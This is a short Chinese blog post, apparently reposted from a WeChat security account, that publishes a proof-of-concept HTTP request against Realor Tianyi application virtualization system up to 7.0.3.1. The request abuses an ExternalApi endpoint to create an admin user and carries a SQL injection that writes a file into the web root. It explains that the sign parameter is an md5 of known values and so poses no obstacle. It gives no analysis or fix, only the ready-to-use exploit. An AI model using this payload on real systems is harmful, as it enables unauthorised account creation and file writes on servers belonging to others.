过程代码懒得贴了
没有记录分析过程,笔记只有poc了,直接贴吧。
POST /ExternalApi.XGI?key=inner&initParams=command_createUser__user_admin__pwd_password&sign=90286714fbfb1b4396d38e0358216dd1 HTTP/1.1
Host: 192.168.0.117
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Cookie:PHPSESSID=s6f7a5s1rui8e64o163b484au1;
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Type: application/octet-stream
Content-Length: 246
{"account":"aaaa' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 into outfile '..\\..\\WebRoot\\11.txt'#","userPwd":"bbbb","userGroupId":"1"}
其中sign签名为initParams+key参数的md5,所以不用管。
原文始发于微信公众号(安全学习与分享):瑞友天翼应用虚拟化系统<=7.0.3.1
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论